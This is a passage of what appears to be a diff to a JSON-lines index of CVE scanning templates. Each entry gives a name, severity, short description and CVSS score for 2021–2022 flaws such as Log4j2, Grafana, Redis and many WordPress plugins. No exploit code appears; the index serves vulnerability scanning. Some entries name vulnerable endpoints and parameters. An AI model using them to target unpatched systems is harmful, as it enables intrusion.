parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-42566.yaml"} +{"ID":"CVE-2021-42567","Info":{"Name":"Apereo CAS Cross-Site Scripting","Severity":"medium","Description":"Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-42567.yaml"} +{"ID":"CVE-2021-42627","Info":{"Name":"D-Link DIR-615 - Unauthorized Access","Severity":"critical","Description":"The WAN configuration page \"wan.htm\" on D-Link DIR-615 devices with firmware 20.06 can be accessed directly without authentication which can lead to disclose the information about WAN settings and also leverage attacker to modify the data fields of page.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-42627.yaml"} +{"ID":"CVE-2021-42663","Info":{"Name":"Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting","Severity":"medium","Description":"Sourcecodester Online Event Booking and Reservation System 2.3.0 contains a cross-site scripting vulnerability in PHP/MySQL via the msg parameter to /event-management/index.php. An attacker can leverage this vulnerability in order to change the visibility of the website. Once the target user clicks on a given link, the content of the HTML code of the attacker's choice displays.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"cves/2021/CVE-2021-42663.yaml"} +{"ID":"CVE-2021-42667","Info":{"Name":"Online Event Booking and Reservation System 2.3.0 - SQL Injection","Severity":"critical","Description":"Online Event Booking and Reservation System 2.3.0 contains a SQL injection vulnerability in event-management/views. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-42667.yaml"} +{"ID":"CVE-2021-42887","Info":{"Name":"TOTOLINK - Authentication Bypass","Severity":"critical","Description":"In TOTOLINK EX1200T V4.1.2cu.5215, an attacker can bypass login by sending a specific request through formLoginAuth.htm.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-42887.yaml"} +{"ID":"CVE-2021-43062","Info":{"Name":"Fortinet FortiMail 7.0.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in FortiMail may allow an unauthenticated attacker to perform an attack via specially crafted HTTP GET requests to the FortiGuard URI protection service.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-43062.yaml"} +{"ID":"CVE-2021-43287","Info":{"Name":"Pre-Auth Takeover of Build Pipelines in GoCD","Severity":"high","Description":"GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-43287.yaml"} +{"ID":"CVE-2021-43421","Info":{"Name":"Studio-42 elFinder \u003c 2.1.60 - Arbitrary File Upload","Severity":"critical","Description":"A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-43421.yaml"} +{"ID":"CVE-2021-43495","Info":{"Name":"AlquistManager Local File Inclusion","Severity":"high","Description":"AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-43495.yaml"} +{"ID":"CVE-2021-43496","Info":{"Name":"Clustering Local File Inclusion","Severity":"high","Description":"Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-43496.yaml"} +{"ID":"CVE-2021-43510","Info":{"Name":"Sourcecodester Simple Client Management System 1.0 - SQL Injection","Severity":"critical","Description":"Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-43510.yaml"} +{"ID":"CVE-2021-43574","Info":{"Name":"Atmail 6.5.0 - Cross-Site Scripting","Severity":"medium","Description":"Atmail 6.5.0 contains a cross-site scripting vulnerability in WebAdmin Control Pane via the format parameter to the default URI, which allows remote attackers to inject arbitrary web script or HTML via the “format” parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-43574.yaml"} +{"ID":"CVE-2021-43734","Info":{"Name":"kkFileview v4.0.0 - Directory Traversal","Severity":"high","Description":"kkFileview v4.0.0 has arbitrary file read through a directory traversal vulnerability which may lead to sensitive file leak on related host.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-43734.yaml"} +{"ID":"CVE-2021-43778","Info":{"Name":"GLPI plugin Barcode \u003c 2.6.1 - Path Traversal Vulnerability.","Severity":"high","Description":"Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-43778.yaml"} +{"ID":"CVE-2021-43798","Info":{"Name":"Grafana v8.x Arbitrary File Read","Severity":"high","Description":"Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `\u003cgrafana_host_url\u003e/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-43798.yaml"} +{"ID":"CVE-2021-43810","Info":{"Name":"Admidio - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-43810.yaml"} +{"ID":"CVE-2021-44077","Info":{"Name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","Severity":"critical","Description":"Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-44077.yaml"} +{"ID":"CVE-2021-44152","Info":{"Name":"Reprise License Manager 14.2 - Authentication Bypass","Severity":"critical","Description":"Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-44152.yaml"} +{"ID":"CVE-2021-44228","Info":{"Name":"Apache Log4j2 Remote Code Injection","Severity":"critical","Description":"Apache Log4j2 \u003c=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\n","Classification":{"CVSSScore":"10"}},"file_path":"cves/2021/CVE-2021-44228.yaml"} +{"ID":"CVE-2021-44427","Info":{"Name":"Rosario Student Information System Unauthenticated SQL Injection","Severity":"critical","Description":"An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-44427.yaml"} +{"ID":"CVE-2021-44451","Info":{"Name":"Apache Superset - Default Login","Severity":"medium","Description":"Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2021/CVE-2021-44451.yaml"} +{"ID":"CVE-2021-44515","Info":{"Name":"Zoho ManageEngine Desktop Central - Remote Code Execution","Severity":"critical","Description":"Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-44515.yaml"} +{"ID":"CVE-2021-44521","Info":{"Name":"Apache Cassandra Load UDF RCE","Severity":"critical","Description":"When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2021/CVE-2021-44521.yaml"} +{"ID":"CVE-2021-44528","Info":{"Name":"Open Redirect in Host Authorization Middleware","Severity":"medium","Description":"Specially crafted \"X-Forwarded-Host\" headers in combination with certain \"allowed host\" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-44528.yaml"} +{"ID":"CVE-2021-44529","Info":{"Name":"Ivanti EPM Cloud Services Appliance Code Injection","Severity":"critical","Description":"Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-44529.yaml"} +{"ID":"CVE-2021-44848","Info":{"Name":"Thinfinity VirtualUI User Enumeration","Severity":"medium","Description":"Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.)","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-44848.yaml"} +{"ID":"CVE-2021-45043","Info":{"Name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","Severity":"high","Description":"Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-45043.yaml"} +{"ID":"CVE-2021-45046","Info":{"Name":"Apache Log4j2 - Remote Code Injection","Severity":"critical","Description":"Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.","Classification":{"CVSSScore":"9"}},"file_path":"cves/2021/CVE-2021-45046.yaml"} +{"ID":"CVE-2021-45092","Info":{"Name":"Thinfinity Iframe Injection","Severity":"critical","Description":"A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the \"vpath\" parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-45092.yaml"} +{"ID":"CVE-2021-45232","Info":{"Name":"Apache APISIX Dashboard \u003c2.10.1 - API Unauthorized Access","Severity":"critical","Description":"In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-45232.yaml"} +{"ID":"CVE-2021-45380","Info":{"Name":"AppCMS - Cross-Site Scripting","Severity":"medium","Description":"AppCMS 2.0.101 has a cross-site scripting vulnerability in \\templates\\m\\inc_head.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-45380.yaml"} +{"ID":"CVE-2021-45422","Info":{"Name":"Reprise License Manager 14.2 - Cross-Site Scripting","Severity":"medium","Description":"Reprise License Manager 14.2 contains a cross-site scripting vulnerability in the /goform/activate_process \"count\" parameter via GET.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-45422.yaml"} +{"ID":"CVE-2021-45428","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","Severity":"critical","Description":"TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-45428.yaml"} +{"ID":"CVE-2021-45967","Info":{"Name":"Pascom CPS Server-Side Request Forgery","Severity":"critical","Description":"Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-45967.yaml"} +{"ID":"CVE-2021-45968","Info":{"Name":"Pascom CPS - Local File Inclusion","Severity":"high","Description":"Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-45968.yaml"} +{"ID":"CVE-2021-46005","Info":{"Name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","Severity":"medium","Description":"Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter.","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2021/CVE-2021-46005.yaml"} +{"ID":"CVE-2021-46068","Info":{"Name":"Vehicle Service Management System - Stored Cross-Site Scripting","Severity":"medium","Description":"A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2021/CVE-2021-46068.yaml"} +{"ID":"CVE-2021-46069","Info":{"Name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","Severity":"medium","Description":"Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Mechanic List section in login panel.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2021/CVE-2021-46069.yaml"} +{"ID":"CVE-2021-46071","Info":{"Name":"ehicle Service Management System 1.0 - Cross-Site Scripting","Severity":"medium","Description":"Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Category List section in login panel.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2021/CVE-2021-46071.yaml"} +{"ID":"CVE-2021-46072","Info":{"Name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","Severity":"medium","Description":"Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Service List section in login panel.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2021/CVE-2021-46072.yaml"} +{"ID":"CVE-2021-46073","Info":{"Name":"Vehicle Service Management System 1.0 - Cross Site Scripting","Severity":"medium","Description":"Vehicle Service Management System 1.0 contains a cross-site scripting vulnerability via the User List section in login panel.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2021/CVE-2021-46073.yaml"} +{"ID":"CVE-2021-46379","Info":{"Name":"D-Link DIR850 ET850-1.08TRb03 - Open Redirect","Severity":"medium","Description":"DLink DIR850 ET850-1.08TRb03 contains incorrect access control vulnerability in URL redirection, which can be used to mislead users to go to untrusted sites.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-46379.yaml"} +{"ID":"CVE-2021-46381","Info":{"Name":"D-Link DAP-1620 - Local File Inclusion","Severity":"high","Description":"D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-46381.yaml"} +{"ID":"CVE-2021-46387","Info":{"Name":"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting","Severity":"medium","Description":"ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-46387.yaml"} +{"ID":"CVE-2021-46417","Info":{"Name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","Severity":"high","Description":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-46417.yaml"} +{"ID":"CVE-2021-46422","Info":{"Name":"SDT-CW3B1 1.1.0 - OS Command Injection","Severity":"critical","Description":"Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-46422.yaml"} +{"ID":"CVE-2021-46424","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","Severity":"critical","Description":"Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2021/CVE-2021-46424.yaml"} +{"ID":"CVE-2022-0140","Info":{"Name":"WordPress Visual Form Builder \u003c3.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-0140.yaml"} +{"ID":"CVE-2022-0147","Info":{"Name":"WordPress Cookie Information/Free GDPR Consent Solution \u003c2.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0147.yaml"} +{"ID":"CVE-2022-0148","Info":{"Name":"WordPress All-in-one Floating Contact Form \u003c2.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page.","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-0148.yaml"} +{"ID":"CVE-2022-0149","Info":{"Name":"WooCommerce Stored Exporter WordPress Plugin \u003c 2.7.1 - Cross-Site Scripting","Severity":"medium","Description":"The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0149.yaml"} +{"ID":"CVE-2022-0150","Info":{"Name":"WordPress Accessibility Helper \u003c0.6.0.7 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0150.yaml"} +{"ID":"CVE-2022-0165","Info":{"Name":"WordPress Page Builder KingComposer \u003c=2.9.6 - Open Redirect","Severity":"high","Description":"WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users).","Classification":{"CVSSScore":"8.80"}},"file_path":"cves/2022/CVE-2022-0165.yaml"} +{"ID":"CVE-2022-0189","Info":{"Name":"WordPress RSS Aggregator \u003c 4.20 - Authenticated Cross-Site Scripting","Severity":"medium","Description":"WordPress RSS Aggregator \u003c 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to reflected cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0189.yaml"} +{"ID":"CVE-2022-0201","Info":{"Name":"WordPress Permalink Manager \u003c2.2.15 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0201.yaml"} +{"ID":"CVE-2022-0208","Info":{"Name":"WordPress Plugin MapPress \u003c2.73.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the \"Bad mapid\" error message, leading to reflected cross-site scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0208.yaml"} +{"ID":"CVE-2022-0218","Info":{"Name":"HTML Email Template Designer \u003c 3.1 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress Email Template Designer WP HTML Mail allows stored cross-site scripting through an unprotected REST-API endpoint.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0218.yaml"} +{"ID":"CVE-2022-0220","Info":{"Name":"WordPress GDPR \u0026 CCPA \u003c1.9.27 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GDPR \u0026 CCPA plugin before 1.9.27 contains a cross-site scripting vulnerability. The check_privacy_settings AJAX action, available to both unauthenticated and authenticated users, responds with JSON data without an \"application/json\" content-type, and JavaScript code may be executed on a victim's browser.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0220.yaml"} +{"ID":"CVE-2022-0271","Info":{"Name":"LearnPress \u003c4.1.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress LearnPress plugin before 4.1.6 contains a cross-site scripting vulnerability. It does not sanitize and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0271.yaml"} +{"ID":"CVE-2022-0281","Info":{"Name":"Microweber Information Disclosure","Severity":"high","Description":"Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2022/CVE-2022-0281.yaml"} +{"ID":"CVE-2022-0288","Info":{"Name":"WordPress Ad Inserter \u003c2.7.10 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0288.yaml"} +{"ID":"CVE-2022-0346","Info":{"Name":"WordPress XML Sitemap Generator for Google \u003c2.0.4 - Cross-Site Scripting/Remote Code Execution","Severity":"medium","Description":"WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0346.yaml"} +{"ID":"CVE-2022-0349","Info":{"Name":"WordPress NotificationX \u003c2.3.9 - SQL Injection","Severity":"critical","Description":"WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0349.yaml"} +{"ID":"CVE-2022-0378","Info":{"Name":"Microweber Cross-Site Scripting","Severity":"medium","Description":"Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-0378.yaml"} +{"ID":"CVE-2022-0381","Info":{"Name":"WordPress Embed Swagger \u003c=1.0.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Embed Swagger plugin 1.0.0 and prior contains a reflected cross-site scripting vulnerability due to insufficient escaping/sanitization and validation via the url parameter found in the ~/swagger-iframe.php file, which allows attackers to inject arbitrary web scripts onto the page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0381.yaml"} +{"ID":"CVE-2022-0412","Info":{"Name":"WordPress TI WooCommerce Wishlist \u003c1.40.1 - SQL Injection","Severity":"critical","Description":"WordPress TI WooCommerce Wishlist plugin before 1.40.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0412.yaml"} +{"ID":"CVE-2022-0422","Info":{"Name":"WordPress White Label CMS \u003c2.2.9 - Cross-Site Scripting","Severity":"medium","Description":"WordPress White Label CMS plugin before 2.2.9 contains a reflected cross-site scripting vulnerability. It does not sanitize and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0422.yaml"} +{"ID":"CVE-2022-0432","Info":{"Name":"Mastodon Prototype Pollution Vulnerability","Severity":"medium","Description":"The GitHub repository mastodon/mastodon prior to 3.5.0 contains a Prototype Pollution vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0432.yaml"} +{"ID":"CVE-2022-0434","Info":{"Name":"WordPress Page Views Count \u003c2.4.15 - SQL Injection","Severity":"critical","Description":"WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability. It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0434.yaml"} +{"ID":"CVE-2022-0437","Info":{"Name":"karma-runner DOM-based Cross-Site Scripting","Severity":"medium","Description":"NPM karma prior to 6.3.14. contains a DOM-based cross-site Scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2022/CVE-2022-0437.yaml"} +{"ID":"CVE-2022-0441","Info":{"Name":"MasterStudy LMS plugin \u003c 2.7.6 - Unauthenticated Admin Account Creation","Severity":"critical","Description":"The MasterStudy LMS WordPress plugin before 2.7.6 does to validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0441.yaml"} +{"ID":"CVE-2022-0482","Info":{"Name":"Easy!Appointments \u003c1.4.3 - Broken Access Control","Severity":"critical","Description":"Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2022/CVE-2022-0482.yaml"} +{"ID":"CVE-2022-0535","Info":{"Name":"WordPress E2Pdf \u003c1.16.45 - Cross-Site Scripting","Severity":"medium","Description":"WordPress E2Pdf plugin before 1.16.45 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, even when the unfiltered_html capability is disallowed. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, making it possible to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2022/CVE-2022-0535.yaml"} +{"ID":"CVE-2022-0540","Info":{"Name":"Atlassian Jira Seraph - Authentication Bypass","Severity":"critical","Description":"Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-0540.yaml"} +{"ID":"CVE-2022-0543","Info":{"Name":"Redis Sandbox Escape - Remote Code Execution","Severity":"critical","Description":"This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The\nvulnerability was introduced by Debian and Ubuntu Redis packages that\ninsufficiently sanitized the Lua environment. The maintainers failed to\ndisable the package interface, allowing attackers to load arbitrary libraries.\n","Classification":{"CVSSScore":"10"}},"file_path":"cves/2022/CVE-2022-0543.yaml"} +{"ID":"CVE-2022-0591","Info":{"Name":"Formcraft3 \u003c3.8.28 - Server-Side Request Forgery","Severity":"critical","Description":"Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.","Classification":{"CVSSScore":"9.10"}},"file_path":"cves/2022/CVE-2022-0591.yaml"} +{"ID":"CVE-2022-0594","Info":{"Name":"Shareaholic \u003c 9.7.6 - Information Disclosure","Severity":"medium","Description":"The Professional Social Sharing Buttons, Icons \u0026 Related Posts WordPress plugin before 9.7.6 does not have proper authorisation check in one of the AJAX action, available to unauthenticated (in v \u003c 9.7.5) and author+ (in v9.7.5) users, allowing them to call it and retrieve various information such as the list of active plugins, various version like PHP, cURL, WP etc.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2022/CVE-2022-0594.yaml"} +{"ID":"CVE-2022-0595","Info":{"Name":"WordPress Contact Form 7 \u003c1.3.6.3 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress Contact Form 7 before 1.3.6.3 contains an unauthenticated stored cross-site scripting vulnerability in the Drag and Drop Multiple File Upload plugin. SVG files can be uploaded by default via the dnd_codedropz_upload AJAX action.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2022/CVE-2022-0595.yaml"} 